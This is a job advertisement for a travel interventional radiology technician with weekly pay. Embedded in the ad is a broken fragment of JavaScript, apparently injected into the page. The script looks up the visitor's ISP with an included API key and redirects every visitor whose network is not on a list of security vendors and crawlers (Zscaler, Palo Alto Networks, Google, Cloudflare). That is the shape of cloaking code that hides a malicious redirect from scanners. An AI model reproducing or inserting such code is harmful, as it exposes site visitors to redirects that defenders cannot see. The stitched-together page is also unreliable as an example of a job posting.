Travel Interventional Radiology Technician – Weekly Pay
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Travel Interventional Radiology Technician to join our team in Nan, California, offering a weekly rate of $2,582. As part of our team, you will assist in performing minimally invasive imaging procedures, ensuring patient safety, and maintaining high-quality imaging standards.
Responsibilities include:
- Preparing and positioning patients for interventional procedures
- Operating and troubleshooting imaging equipment
- Assisting physicians during procedures and ensuring sterile techniques
- Monitoring patient vitals and providing post-procedure care
- Maintaining accurate documentation of procedures and patient records
Skills needed:
- Strong knowledge of interventional radiology procedures
- Excellent communication and patient care skills
- Ability to work effectively in a fast-paced environment
- Attention to detail and strong technical skills
Benefits include:
- Competitive weekly pay
- Travel and housing stipends
- Health insurance options
- Flexible scheduling
- Supportive team environment